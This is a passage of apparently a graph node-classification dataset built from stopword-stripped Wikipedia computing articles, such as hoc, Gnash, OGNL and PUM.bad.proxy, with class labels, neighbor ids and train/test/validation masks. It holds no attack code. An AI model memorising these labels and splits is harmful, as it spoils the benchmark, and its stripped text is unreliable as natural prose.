    "text": "Hoc_(programming_language):hoc programming language hoc acronym high order calculator interpreted programming language used 1984 book unix programming environment demonstrate build interpreters using yacc hoc developed brian kernighan rob pike glorified interactive calculator basic functionality evaluate floating-point numerical expressions e.g. 1+2*sin 0.7 variables added conditionals loops user-defined functions simple io using syntax resembling c. improved hoc interpreter included eighth edition research unix 1985 generally adopted commercial unix systems linux distributions instead earlier calculator languages dc bc become widespread systems hoc survived continued evolve part plan 9 operating system several improved versions hoc released free software bell labs individuals see list hoc used primary scripting language neuron simulator following simple example interactive calculator session hoc text represents hoc output simple example functions flow control",
    "neighbors": [
      6369,
      8262,
      8522,
      4433,
      9714,
      5492,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 9579,
    "label": 9,
    "text": "Gnash_(software):gnash software gnash media player playing swf files gnash available standalone player desktop computers embedded devices well plugin several browsers part gnu project free open-source alternative adobe flash player developed gameswf project gnash first announced late 2005 software developer john gilmore project maintainer rob savoye main developer web site gnash located free software foundation gnu savannah project support server gnash supports swf v7 features swf v8 v9 however swf v10 supported writing free software flash player priority gnu project time prior launch gnash gnu project asked people assist gplflash project majority previous gplflash developers moved gnash project existing gplflash codebase refocused towards supporting embedded systems primary distribution terms gnash gnu gpl however since gnash started using codebase gameswf project public domain code developed gnash project might useful gameswf placed public domain adobe provides outdated version 11.2 official player linux ia-32 amd64 developer preview release binary-only form gnash however compiled executed many architectures including x86 arm mips powerpc also supports bsd-based operating systems early port risc os never macromedia/adobe flash support beyond flash 3 exist well early port beos flash support terminated version 4 development port amigaos 4.1 also recently begun port haiku operating system also exists gnash requires one agg cairo opengl rendering contrast gnu projects typically written c gnash written c++ programming language gameswf heritage gnash play swf files version 7 80 actionscript 2.0 goal gnash developers compatible possible proprietary player including behavior bad actionscript code however gnash offers special features available adobe player possibility extend actionscript classes via shared libraries sample extensions include mysql support file system access security reasons extension mechanism must compiled-in explicitly enabled via configuration files gnash supports playback flv videos allows playing flv files youtube myspace showmedo similar websites older files sound – newer files without playing sound flv support requires ffmpeg gstreamer installed system free-software programs mplayer vlc media player players windows based ffdshow directshow codecs play back flv format file specially downloaded piped version 0.8.8 released 22 august 2010 rob savoye announced gnash work youtube videos version 0.8.8 gpu support pushed ahead proprietary adobe flash player linux flash 10.2 came hardware acceleration built gnash still suffers high cpu usage flashblock plugin installed user turning flash support case-by-case needed basis youtube video controls full screen mode functioning although version 0.8.8 bug cause youtube display invalid parameters many popular flash games work gnash 0.8.8 cygnal gnash project flash media server-compatible audio video server handles negotiating copyright metadata exchange well streaming content need handle many thousands simultaneous network connection support running large gnu/linux clusters support handling multiple streams differing content well multicast stream single data source due patent issues surrounding mp3 fact flv on2 closed formats one main goals project support free codes free protocols primary way things optional support mp3 flv on2 vp6 vp7 playing existing flash content flv vp6 vp7 codecs included ffmpeg users use ffmpeg plugin gstreamer 0.10 use proprietary codecs gnash successfully run microsoft windows darwin os x irix solaris beos os/2 haiku gnash also run following 64-bit systems powerpc itanium ultrasparc amd64 gnash ported windows plugin works best firefox 1.0.4 newer work mozilla-based browser however newer browsers plugin may become unstable inoperative newer gnash binaries windows include plugin currently newer working gnash plugin windows project financially supported commercial company lulu.com july 2010 march 2012 lead developer reported donations barely enough pay hosting project web one problem project difficulty finding developers current developers never installed adobe flash player fear anyone ever installed adobe flash player time accepted agreement modify reverse engineer flash player therefore gnash project 6 active developers november 2010 generic clauses however may national anticompetition laws used normal software license agreements may 2 2012 court justice european union ruled case c-406/10 sas institute inc v world programming ltd functionality computer program covered copyright european union contractual provisions null void forbid observing studying testing computer program order reproduce behavior second program holds long source code object code copied",
    "neighbors": [
      2050,
      1028,
      2062,
      9245,
      3618,
      2603,
      5165,
      5677,
      3631,
      576,
      7234,
      8258,
      8771,
      10822,
      5703,
      1112,
      3674,
      2658,
      5743,
      8303,
      2673,
      8304,
      9848,
      5754,
      7292,
      5759,
      1664,
      1666,
      2180,
      4230,
      9865,
      6285,
      6797,
      7309,
      3731,
      3734,
      3744,
      4265,
      4777,
      11442,
      692,
      2233,
      4292,
      5833,
      4822,
      9943,
      9434,
      7904,
      4321,
      10464,
      10470,
      3817,
      9964,
      10480,
      2804,
      8436,
      8700,
      5380,
      9491,
      1812,
      4378,
      2332,
      10012,
      802,
      3876,
      11559,
      7983,
      6962,
      823,
      1347,
      1348,
      8524,
      8554,
      10097,
      1394,
      5492,
      3462,
      8071,
      8582,
      11654,
      4493,
      1939,
      9118,
      10654,
      934,
      9128,
      8618,
      11180,
      5555,
      9148,
      10687,
      9667,
      8644,
      4550,
      7629,
      4561,
      8147,
      5078,
      2010,
      479,
      9696,
      8673,
      5612,
      1007,
      499,
      3068,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9580,
    "label": 8,
    "text": "Comparison_of_web_server_software:comparison web server software web server software allows computers act web servers first web servers supported static files html images commonly allow embedding server side applications web application frameworks include simple http servers example django framework provides codice_1 php built-in server generally intended use initial development production server require robust http front-end one servers listed",
    "neighbors": [
      1920,
      4485,
      3462,
      7430,
      9229,
      7567,
      7695,
      1937,
      11154,
      7443,
      1556,
      8350,
      10016,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      558,
      9647,
      10800,
      11439,
      4658,
      2485,
      11189,
      6714,
      64,
      9281,
      9665,
      10622,
      8644,
      1991,
      11134,
      595,
      1363,
      1747,
      1367,
      4056,
      3545,
      4439,
      4059,
      1757,
      225,
      865,
      1250,
      2404,
      4837,
      5731,
      9320,
      6379,
      2287,
      11376,
      8691,
      10611,
      4725,
      11386,
      3323,
      3966,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 9581,
    "label": 3,
    "text": "Omega2_(computer):omega2 computer omega2 personal single-board computer created toronto-based startup company called onion released kickstarter advertised world smallest linux server system combines tiny form factor power-efficiency arduino power flexibilities raspberry pi identified fcc identifier 2ajvp-omega2 runs linux kernel based lightweight operating system embedded system called openwrt soc planned shipped end november 2016 omega2 next generation old product onion makes omega original omega based qualcomm atheros ar9331 mips architecture soc runs full linux operating system designed embedded system sold 19.99 company discontinued development omega replaced successor omega2 using another soc chip mediatek mt7688 also metal cover chip also drastically cut price 5 later increased 7.5 beginning 2017 onion already attracted crowdfunding 850,000 omega2 greatly exceeded initial goal 440,000 omega2 comes two versions basic omega2 omega2 plus omega2 cpu based mips architecture running 580 mhz clock speed equipped 64 mb ram 16 mb flash memory omega2 plus similar omega2 except 128 mb ram 32 mb memory microsd slot sold 9 usd system comes small pcb footprint dual-in-line 16x2mm pins board runs 3.3 volts power average power consumption 0.6w devices intended headless computers graphical interfaces embedded systems",
    "neighbors": [
      1537,
      3585,
      2308,
      11396,
      6925,
      1682,
      11282,
      405,
      666,
      5019,
      4124,
      6178,
      8237,
      7983,
      9266,
      823,
      3511,
      1849,
      8250,
      9913,
      1728,
      10945,
      6978,
      7234,
      10820,
      6981,
      11080,
      11337,
      2635,
      2383,
      5339,
      2524,
      2784,
      1377,
      2788,
      3300,
      5356,
      2285,
      9964,
      1776,
      499,
      2420,
      10109
    ],
    "mask": "None"
  },
  {
    "node_id": 9582,
    "label": 3,
    "text": "CLMUL_instruction_set:clmul instruction set carry-less multiplication clmul extension x86 instruction set used microprocessors intel amd proposed intel march 2008 made available intel westmere processors announced early 2010 mathematically instruction implements multiplication polynomials finite field gf 2 bitstring formula_1 represents polynomial formula_2 clmul instruction also allows efficient implementation closely related multiplication larger finite fields gf 2 traditional instruction set one use instructions improve speed applications block cipher encryption galois/counter mode depends finite field gf 2 multiplication another application fast calculation crc values including used implement lz77 sliding window deflate algorithm zlib pngcrush instruction computes 128-bit carry-less product two 64-bit values destination 128-bit xmm register source may another xmm register memory immediate operand specifies halves 128-bit operands multiplied mnemonics specifying specific values immediate operand also defined presence clmul instruction set checked testing one",
    "neighbors": [
      9092,
      2821,
      3973,
      4491,
      4108,
      4237,
      5645,
      6924,
      5649,
      7313,
      4886,
      6038,
      9111,
      9369,
      7963,
      9500,
      2719,
      5883,
      2088,
      2094,
      9391,
      8120,
      8506,
      2237,
      1085,
      5309,
      8125,
      833,
      6978,
      7234,
      5444,
      8126,
      3142,
      9541,
      11080,
      2764,
      1998,
      5326,
      977,
      2514,
      3537,
      2516,
      5073,
      5844,
      9428,
      4603,
      7387,
      4444,
      8795,
      3294,
      2655,
      1119,
      1122,
      7783,
      1000,
      10985,
      4204,
      8684,
      5358,
      9964,
      8944,
      499,
      1399,
      9976,
      4217,
      1915,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 9583,
    "label": 8,
    "text": "Automated_Logic_Corporation:automated logic corporation automated logic corporation located kennesaw georgia united states manufactures building automation systems several technological innovations include webctrl® building automation system environmental index™ tool thermographic color floor plans time-lapse™ graphics fault detection diagnostics fdd eikon uniquely powerful universal programming tool i/o hardware including controllers routers webctrl bacnet native browser-based building automation system users fully access buildings schedules setpoints trends alarms control functions virtually computer anywhere world users also control buildings webctrl wireless devices tablets cell phones webctrl supports multiple languages simultaneously includes powerful spreadsheet-based reporting tool native bacnet system webctrl interfaces lonworks modbus many protocols provide integrated solution building control needs webctrl certified bacnet testing laboratory bacnet advanced workstation software automated logic systems installed commercial office buildings industrial plants critical mission facilities healthcare facilities educational facilities government complexes hospitality/entertainment venues retail locations worldwide products sold international network dealers design engineer install support automated logic products automated logic corporation acquired carrier corporation parent united technologies corporation 2004 founding member bacnet manufacturers association automated logic one first offer products using industry ’ standard protocol – bacnet",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 9584,
    "label": 7,
    "text": "Skillhive:skillhive skillhive enterprise social software collaborative software designed assessing finding sharing developing expertise within organizations professional associations skillhive used various purposes competence-based management development knowledge management talent management organizational learning innovation skillhive targeted medium large sized businesses organizations operating dynamic environment continuous learning knowledge sharing experts vital skillhive built concept called swarm work swarm work defined way working aims imitate swarm intelligence form collective intelligence enable decentralized groups self-organize effectively work together towards common goal without need central coordination skillhive provided software service saas cloud on-demand service software servers data maintained service provider customer gets right receive use service since need download install software saas services like skillhive seen easy deploy skilllhive web browser based works operating systems supported up-to-date web browsers service developed using html5 javascript css php technologies enables scale different mobile devices like tablets smartphones skillhive provides advanced programming interface api enables integrate information systems human resource systems intranets skillhive linkedin integration enables transfer profile information including photos cv information service skillhive developed intunex ltd finnish technology company founded janne ruohisto 2008 intunex received innovation product development fund tekes 2010 intunex launched first commercial version skillhive called xtune 2011 skillhive received awards including association finnish elearning centre interactive learning award eeemeli – best collaboration application 2012 hr tech europe finalist 2012",
    "neighbors": [
      4194,
      467,
      8644,
      3462
    ],
    "mask": "Test"
  },
  {
    "node_id": 9585,
    "label": 4,
    "text": "InMage:inmage inmage computer software company based us india markets product line called scout uses continuous data protection cdp backup replication scout consists two product lines host-offload line uses software agent protected servers fabric line uses agent fibre channel switch fabric software protects volume block level tracking write changes allows local remote protection policies first version product released 2002 scout features capacity optimized cdp repository continuous approach allows near zero backup windows point time restores second level rpos within datacenter across datacenters target volume kept updated either synchronously asynchronously based product line retention logs allow point time recovery user specified retention window scout also features application failover support disaster recovery 6.2 release scout supported microsoft windows linux solaris aix hp ux also supports vmware xenserver hyper-v solaris zones server virtualization platforms server application failover supported microsoft windows application failover supports microsoft exchange blackberry enterprise server microsoft sql server file servers microsoft sharepoint oracle mysql among others 6.2 release series supports clustered non clustered operation scout integrates traditional tape backup software enable longer term retention tape scout integrates microsoft vss apis sql exchange hyper-v consistent snapshots also integrates oracle db2 mysql postgresql consistency apis inmage founded 2001 dr. murali rajagopal kumar malvalli sv systems microsoft corporation acquired inmage 2014",
    "neighbors": [
      4356,
      11524,
      1801,
      6153,
      6797,
      782,
      1935,
      10900,
      11030,
      1304,
      1049,
      11549,
      7970,
      3366,
      1832,
      6827,
      7983,
      3890,
      8757,
      823,
      9655,
      4289,
      9033,
      10957,
      1358,
      4051,
      11221,
      11605,
      11103,
      10338,
      617,
      8681,
      5612,
      7022
    ],
    "mask": "Test"
  },
  {
    "node_id": 9586,
    "label": 5,
    "text": "Random-access_channel:random-access channel random-access channel rach shared channel used wireless terminals access mobile network tdma/fdma cdma based network call set-up bursty data transmission whenever mobile wants make mo mobile originating call schedules rach rach transport-layer channel corresponding physical-layer channel prach since rach shared probability two mobiles transmit time transmissions collide medium air granted access network happens limit number mobiles transmitting one rach time slot defined gsm standard collision happens mobile waits random period time transmits rach rach uses gsm 51 frame multiframe structure uplink transmit information mostly ts1 used high capacity gsm cell areas ts2 ts4 ts6 also used rach leaving ts0 mainly used broadcast frequency random-access channel like mobile phone networks also used openairmesh network cluster heads mesh routers key feature random-access channel messages scheduled compared example dedicated channel umts assigned exclusively one user time certainty single device makes connection attempt one time collisions result",
    "neighbors": [
      11181
    ],
    "mask": "Test"
  },
  {
    "node_id": 9587,
    "label": 9,
    "text": "Conditional_compilation:conditional compilation computer programming conditional compilation compilation implementing methods allow compiler produce differences executable program produced controlled parameters provided compilation technique commonly used differences needed run software different platforms different versions required libraries hardware many programming languages support conditional compilation typically compiler directives define undefine certain variables directives test variables modify compilation accordingly example using actual language compiler may set define macintosh undefine pc code may contain c languages similar syntax done using ifdef directive similar procedure using name conditional comment used microsoft internet explorer version 5 9 interpret html code also similar proprietary mechanism adding conditional comments within jscript known conditional compilation",
    "neighbors": [
      1952,
      3491,
      8262,
      5896,
      8680,
      8874,
      5612,
      2804,
      4151,
      3960,
      10684,
      603,
      10620,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9588,
    "label": 4,
    "text": "Backscatter_(email):backscatter email backscatter also known outscatter misdirected bounces blowback collateral spam incorrectly automated bounce messages sent mail servers typically side effect incoming spam recipients messages see form unsolicited bulk email spam solicited recipients substantially similar delivered bulk quantities systems generate email backscatter may listed various email blacklists may violation internet service providers terms service backscatter occurs worms spam messages often forge sender addresses instead simply rejecting spam message misconfigured mail server sends bounce message forged address normally happens mail server configured relay message after-queue processing step example antivirus scan spam check fails time antivirus scan spam check done client already disconnected cases normally possible reject smtp transaction since client would time waiting antivirus scan spam check finish best thing case silently drop message rather risk creating backscatter measures reduce problem include avoiding need bounce message rejections initial smtp connection stage cases sending bounce messages addresses reliably judged forged cases sender verified thus ignoring message i.e. dropping authors spam viruses wish make messages appear originate legitimate source fool recipients opening message often use web-crawling software scan usenet postings message boards web pages legitimate email addresses due design smtp mail recipient mail servers receiving forged messages simple standard way determine authenticity sender accept email connection phases checking refuse e.g. software determines message likely spam use potentially forged sender address attempt good-faith effort report problem apparent sender mail servers handle undeliverable messages four fundamentally different ways backscatter occurs bounce method used sender information incoming email unrelated third party every step control worms spam messages helps reduce backscatter common approaches section also reduce problem initial smtp connection mailservers range checks often reject email 5xx error code sending server still connected rejecting message connection-stage way usually cause sending mta generate local bounce message non-delivery notification ndn local authenticated user reasons rejection include mail transfer agents mtas forward mail avoid generating backscatter using transparent smtp proxy mail servers sending email bounce messages use range measures judge whether return address forged preventing backscatter desirable also possible reduce impact filtering many spam filtering systems include option attempt detect reject backscatter email spam addition systems using schemes bounce address tag validation tag outgoing email way allows reliably detect incoming bogus bounce messages",
    "neighbors": [
      2848,
      5249,
      8224,
      1667,
      10696,
      2409,
      6762,
      113,
      8337,
      6261,
      3350,
      9909,
      2041,
      10906,
      3549
    ],
    "mask": "None"
  },
  {
    "node_id": 9589,
    "label": 2,
    "text": "Enterprise_Objects_Framework:enterprise objects framework enterprise objects framework commonly simply eof introduced next 1994 pioneering object-relational mapping product nextstep openstep development platforms eof abstracts process interacting relational database mapping database rows java objective-c objects largely relieves developers writing low-level sql code eof enjoyed niche success mid-1990s among financial institutions attracted rapid application development advantages next object-oriented platform since apple inc merger next 1996 eof evolved fully integrated part webobjects application server also originally next many core concepts eof re-emerged part core data abstracts underlying data formats allow based non-sql stores early 1990s next computer recognized connecting databases essential businesses yet also potentially complex every data source different data-access language api driving costs learn use vendor product next engineers wanted apply advantages object-oriented programming getting objects talk relational databases two technologies different solution create abstraction layer insulating developers writing low-level procedural code sql specific data source first attempt came 1992 release database kit dbkit wrapped object-oriented framework around database unfortunately nextstep time powerful enough dbkit serious design flaws next second attempt came 1994 enterprise objects framework eof version 1 complete rewrite far modular openstep compatible eof 1.0 first product released next using foundation kit introduced autoreleased objects developer community development team time four people jack greenfield rich williamson linus upson dan willhite eof 2.0 released late 1995 refined architecture introducing editing context point development team consisted dan willhite craig federighi eric noyau charly kleissner eof achieved modest level popularity financial programming community mid-1990s would come emergence world wide web concept web applications clear eof could help companies plug legacy databases web without rewriting data addition frameworks state management load balancing dynamic html generation next able launch first object-oriented web application server webobjects 1996 eof core 2000 apple inc. merged next officially dropped eof standalone product meaning developers would unable use create desktop applications forthcoming mac os x would however continue integral part major new release webobjects webobjects 5 released 2001 significant fact frameworks ported native objective-c programming language java language critics change argue power eof side effect objective-c roots eof lost beauty simplicity third-party tools eogenerator help fill deficiencies introduced java mainly due loss categories objective-c code base re-introduced modifications desktop application developers core data part apple cocoa api release mac os x tiger april 2005 enterprise objects provides tools frameworks object-relational mapping technology specializes providing mechanisms retrieve data various data sources relational databases via jdbc jndi directories mechanisms commit data back data sources mechanisms designed layered abstract approach allows developers think data retrieval commitment higher level specific data source data source vendor central mapping model file eomodel build visual tool — either eomodeler eomodeler plug-in xcode mapping works follows build data models based existing data sources build data models scratch use create data structures tables columns joins data source result database records transposed java objects advantage using data models applications isolated idiosyncrasies data sources access separation application business logic database logic allows developers change database application accesses without needing change application eof provides level database transparency seen tools allows model used access different vendor databases even allows relationships across different vendor databases without changing source code power comes exposing underlying data sources managed graphs persistent objects simple terms means organizes application model layer set defined in-memory data objects tracks changes objects reverse changes demand user performs undo command time save changes application data archives objects underlying data sources designing enterprise objects developers leverage object-oriented feature known inheritance customer object employee object example might inherit certain characteristics generic person object name address phone number kind thinking inherent object-oriented design relational databases explicit support inheritance however using enterprise objects build data models reflect object hierarchies design database tables support inheritance also designing enterprise objects map multiple tables particular views database table enterprise object analogous often known object-oriented programming business object — class models physical conceptual object business domain e.g customer order item etc. makes eo different objects instance data maps data store typically enterprise object contains key-value pairs represent row relational database key basically column name value row database said eo properties persist beyond life particular running application precisely enterprise object instance class implements com.webobjects.eocontrol.eoenterpriseobject interface enterprise object corresponding model called eomodel defines mapping class object model database schema however enterprise object n't explicitly know model level abstraction means database vendors switched without affecting developer code gives enterprise objects high degree reusability despite common origins two technologies diverged technology retaining subset features original objective-c code base adding new features eof supports custom sql shared editing contexts nested editing contexts pre-fetching batch faulting relationships features original objective-c implementation supported core data core data also provide equivalent eomodelgroup—the nsmanagedobjectmodel class provides methods merging models existing models retrieving merged models bundles core data supports fetched properties multiple configurations within managed object model local stores store aggregation data given entity may spread across multiple stores customization localization property names validation warnings use predicates property validation features original objective-c implementation supported java implementation",
    "neighbors": [
      2819,
      9123,
      9286,
      10470,
      3080,
      8201,
      7307,
      5677,
      10413,
      8303,
      8304,
      10478,
      119,
      11257,
      9467,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 9590,
    "label": 9,
    "text": "OGNL:ognl object-graph navigation language ognl open-source expression language el java using simpler expressions full range supported java language allows getting setting properties defined setproperty getproperty methods found javabeans execution methods java classes also allows simpler array manipulation aimed used java ee applications taglibs expression language ognl created luke blanshard drew davidson ognl technology ognl development continued opensymphony closed 2011 ognl developed part apache commons ognl began way map associations front-end components back-end objects using property names associations gathered features drew davidson created key-value coding language kvcl luke blanshard reimplemented kvcl using antlr started using name ognl technology reimplemented using java compiler compiler javacc ognl uses java reflection introspection address object graph runtime application allows program change behavior based state object graph instead relying compile time settings also allows changes object graph due ability create change executable code ognl capable introducing critical security flaws framework uses multiple apache struts 2 versions vulnerable ognl security flaws october 2017 recommended version struts 2 2.5.13 users urged upgrade latest version older revisions documented security vulnerabilities — example struts 2 versions 2.3.5 2.3.31 2.5 2.5.10 allow remote attackers execute arbitrary code",
    "neighbors": [
      8262,
      1095,
      1258,
      5612,
      5677,
      10573,
      7983,
      5682,
      11354,
      10559
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9591,
    "label": 4,
    "text": "PUM.bad.proxy:pum.bad.proxy pum.bad.proxy form malware known registry hack unauthorized alteration windows registry file specifically redirects lan settings within internet explorer popular web browser commonly installed default web browser microsoft windows first spotted users malwarebytes anti-malware security software 22 january 2011 reported malwarebytes software 200 times first day alone name assigned malwarebytes anti-malware specific name unique virus hack pum defines potentially unwanted modification bad.proxy defines modification ability search alert user potentially unwanted modifications added malware bytes november 2010 likely first day users began reporting pum.bad.proxy first day hack existed rather first time malware bytes could alert user vulnerability also fact proxy server often active malware bytes alerts user presence may indicate remnant virus hack malicious software previously removed quarantined hack alters proxy server address settings redirect web access requests back computer internal lan address 127.0.0.1 effectively cutting computer access internet origin method propagation currently unknown altered registry setting affects users internet explorer including recent version internet explorer 9 browsers firefox depend upon specific windows registry item proxy address port settings affected registry value hkey_current_user\\software\\microsoft\\windows\\currentversion\\internet settings\\proxyserver value set 127.0.0.1 computer internal address network card various port numbers reported",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      6797,
      9233,
      8978,
      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      6520,
      2213,
      8998,
      9256,
      939,
      7983,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      3320,
      8386,
      3395,
      4165,
      2508,
      5078,
      7515,
      3941,
      107,
      877,
      4725,
      4344,
      2041,
      5245,
      1279
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9592,
    "label": 3,
    "text": "Socket_3:socket 3 socket 3 series cpu sockets various x86 microprocessors sometimes found alongside secondary socket designed math coprocessor chip case 487 socket 3 resulted intel creation lower voltage microprocessors upgrade socket 2 rearranged pin layout socket 3 237-pin low insertion force lif zero insertion force zif 19×19 pin grid array pga socket suitable 3.3 v 5 v 25–50 mhz intel 486 sx 486 dx 486 dx2 486 dx4 486 overdrive pentium overdrive processors well amd am486 am5x86 cyrix cx5x86 processors",
    "neighbors": [
      5901,
      6415,
      8851,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2874,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      499,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 9593,
    "label": 2,
    "text": "Microsoft_Management_Console:microsoft management console microsoft management console mmc component windows 2000 successors provides system administrators advanced users interface configuring monitoring system management console host component object model components called snap-ins microsoft administration tools implemented mmc snap-ins third parties also implement snap-ins using mmc application programming interfaces published microsoft developer network web site snap-ins registered codice_1 codice_2 registry keys snap-in combined mmc called management saved console file .msc extension launched using syntax codice_3 prolific mmc component computer management appears administrative tools folder control panel system security category view computer management actually consists collection mmc snap-ins including device manager disk defragmenter internet information services installed disk management event viewer local users groups except home editions windows shared folders tools computer management also pointed another windows machine altogether allowing monitoring configuration computers local network user access mmc snap-ins common use include",
    "neighbors": [
      11270,
      5643,
      13,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2603,
      2101,
      10812,
      3648,
      10310,
      8265,
      1098,
      7754,
      7244,
      4173,
      4174,
      10828,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      8976,
      11030,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      4926,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      2943,
      1418,
      5003,
      5004,
      8080,
      11667,
      11677,
      8607,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      2027,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9594,
    "label": 4,
    "text": "Greynet:greynet within context corporate organizational networks greynet grayware elusive networked computer application downloaded installed end user systems without express permission network administrators often without awareness cognition deeply embedded organization ’ network fabric applications may marginal use user inevitably consume system network resources addition greynet applications often open door end use systems become compromised additional applications security risks malware computer workstations become connected internet variety programs proliferated offer ability extend communications gather deliver information serve needs marketing concerns among first emerge instant messaging clients icq aol instant messenger msn messenger developments technology added video capability webcam units worked together take advantage available bandwidth single small network corporate environments growth greynets takes advantage software hardware developments informal networks appearing provide variety streaming media content supplied modified end users emerging category podcasting users generate content widespread download portable mp3 players problem greynet programs fourfold first greynet programs create network security risks causing broad vectors malware dissemination second create privacy issues network opening large holes information leakage third greynet programs create compliance issues computer network creating invisible parallel communications network fourth create issues local machines consumption local system resources possible operating system program stability concerns things increase network administration time costs added corporate work environment loss meaningful production time due non-work related distractions greynet applications individual network environment policies may vary non-existent full lockdown end user system privileges see risks liabilities section instant messaging detailed overview threats risks solutions problems prevalent greynet programs public im dealing security aspects greynets led emergence specific administrative software packages monitor control traffic well enhancement security suites adware clients among first prevalent specific administrative software packages products secure networks threats borne im p2p networks products first introduced 2002 protect 10 15 u.s. corporations",
    "neighbors": [
      939,
      877,
      7983,
      8978,
      10392,
      7515
    ],
    "mask": "Train"
  },
  {
    "node_id": 9595,
    "label": 8,
    "text": "Platial:platial platial collaborative user generated cartographic website founded 2004 di-ann eisnor jake olsen jason wilson platial inc. headquartered portland oregon platial used hundreds thousands people globally share associate relevant content geographic places interest platial claims 25 web map widgets used 10,000 sites october 18 2007 platial acquired frappr another social mapping website increasing total user-generated locations 100 million february 27 2010 platial announced service would closing within days geographic information science literature concept 'platial refers place-based studies parallel use 'spatial space-based coordinate-system oriented studies",
    "neighbors": [
      735,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 9596,
    "label": 9,
    "text": "Discriminator:discriminator distributed computing discriminator typed tag field present omg idl discriminated union type value definitions determines union member selected current union instance unlike conventional programming languages offering support unions discriminator idl identical selected field name example idl union type definition effective value register type may contain ax selected field discriminator value may either b stored memory separately therefore idl logically separates information currently selected field name union effective value information current discriminator value example discriminator value may anything following b c well characters belonging idl codice_1 type since codice_2 branch specified example register type allows use remaining characters well microsoft interface definition language also supports tagged unions allowing choose discriminator via attribute enclosing structure function",
    "neighbors": [
      10465,
      347,
      8262,
      1407
    ],
    "mask": "Test"
  },
  {
    "node_id": 9597,
    "label": 3,
    "text": "Cylinder_1024:cylinder 1024 cylinder 1024 first cylinder hard disk inaccessible original ibm pc compatible hardware specification interrupt 13h uses cylinder-head-sector addressing boot time bios many old pcs could access first 1024 cylinders numbered 0 1023 chs addressing defines 10 bits cylinder count 2^10=1024 problem operating systems x86 platform bios must able load bootloader entire kernel image memory must therefore located first 1024 cylinders disk older versions microsoft windows resolved necessitating operating system installed first partition partly bug users linux operating system traditionally created /boot partition reside within first 1024 cylinders disk containing little kernel bootloader",
    "neighbors": [
      6118,
      2762,
      1515,
      6797,
      7983,
      6129,
      499,
      4563,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9598,
    "label": 3,
    "text": "Palm_VIIx:palm viix palm viix personal digital assistant made palm inc device featured antenna used wireless data communication connectivity provided mobitex network defunct palm.net service web clipping applications used network process data cost service 14.95 per month allowed limited number web pages viewed palm viix succeeded original palm vii replaced palm i705",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      5318,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      1776,
      2420,
      8952
    ],
    "mask": "None"
  },
  {
    "node_id": 9599,
    "label": 3,
    "text": "HP_2100:hp 2100 hp 2100 series 16-bit minicomputers produced hewlett-packard hp mid-1960s early 1990s tens thousands machines series sold twenty-five year lifetime making hp fourth largest minicomputer vendor 1970s design started data systems inc dsi originally known dsi-1000 hp purchased company 1964 merged dymec division original model 2116a built using integrated circuits magnetic-core memory released 1966 next four years several new versions released including sub-models c different types memory expansion 2115 2114 cost-reduced versions 2116 models replaced hp 2100 series 1971 21mx series 1974 magnetic-core memory replaced semiconductor memory models also packaged hp 2000 combining 2100-series machine optional components order run basic programming language multi-user time sharing fashion hp time-shared basic popular 1970s many early basic programs written platform notably seminal star trek popular early home computer era people computer company published programs hp 2000 format introduction hp 3000 1974 provided high-end competition 2100 series entire line renamed hp 1000 1977 positioned real-time computers greatly redesigned version introduced 1979 1000 l-series using cmos large scale integration chips introducing desk-side tower case model first version break backward compatibility previous 2100-series expansion cards final upgrade a-series new processors capable 1 mips performance final a990 released 1990 hp formed dynac 1956 act development shop projects main company would normally undertake original logo simply hp logo turned upside forming something approximating dy learning westinghouse owned trademark name 1958 changed dymec company brought in-house 1959 become dymec division november 1967 renamed palo alto division dymec originally made variety products hp family time became primarily integrator building test equipment similar systems used hp 1964 kay magleby paul stoft began experimenting use pdp-5 pdp-8 computers act controllers complex test systems however felt machines would require changes truly suit needs time digital equipment corporation dec still small company takeover target however david packard found ken olsen difficult deal plans went nowhere looking another design could purchase packard led five-person data systems inc. dsi detroit dsi owned union carbide packard asked union carbide came computer company hp labs manager barney oliver replied n't demand answer question bill hewlett initially refused consider development minicomputer packard reframed instrument controller deal approved dsi purchased 1964 initially set dymec four original five employees dsi number employees coming hp instrumentation divisions computer group 